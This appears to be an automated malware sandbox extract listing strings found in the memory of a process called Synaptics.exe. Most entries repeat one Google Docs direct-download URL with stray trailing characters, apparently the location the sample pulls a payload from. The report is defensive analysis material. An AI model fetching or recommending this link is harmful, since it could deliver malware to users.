                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.V
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.y
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//T
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/Driv.
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/c
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0)
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1OF
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1b
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2-
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2B
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2Yb
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3(
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3M
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lss
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4(z
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4NK
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5/
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5c
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5~
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download64
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download67:7
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6Cd
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6L
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7~
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download81
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8M
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9N
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9a
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:/
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:11:~
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download::
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:Ax
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV-
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVB
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVCPS.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVa
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWN
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWh
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWsu
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWt(
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX)
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ5
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZDGUK
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_f
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-arc
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada=259
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadackgr
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadads
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis6KL
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadatche
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadatm#
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadax-ag
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb5
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbL
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbYTpp
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceKw;
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceOs7
